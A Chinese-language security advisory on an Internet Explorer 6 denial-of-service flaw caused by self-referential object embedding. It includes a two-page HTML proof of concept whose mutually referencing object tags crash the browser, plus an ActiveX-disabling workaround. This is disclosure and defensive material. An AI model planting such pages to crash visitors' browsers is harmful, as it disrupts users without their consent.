Microsoft IE对象嵌入拒绝服务漏洞

发布日期：2002-04-20
更新日期：2005-05-31

受影响系统：

Microsoft Internet Explorer 6.0 SP2

描述：

---

BUGTRAQ ID: 13800

Microsoft Internet Explorer是一款Microsoft分发和维护的WEB浏览器。

Microsoft Internet Explorer在处理self-referential对象的时候存在漏洞，可导致IE崩溃。

Microsoft Internet Explorer由于在处理部分HTML文档中部分self-referential对象定义时存在错误，攻击者可以建立"text/html"类型的对象，并使用DATA字段引用HMTL文档名称，当IE处理此类页面时，即可导致崩溃。

<*来源：Matthew Murphy （mattmurphy@kc.rr.com）
Benjamin Tobias Franz （0-1-2-3@gmx.de）

链接：http://archives.neohapsis.com/archives/bugtraq/2002-04/0293.html
http://marc.theaimsgroup.com/?l=bugtraq&m=111746441220149&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Page #1 (保存为"btf1.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>

Page #2 (保存为"btf2.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 暂时在所有安全区域中关闭"运行ActiveX控件和插件"。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!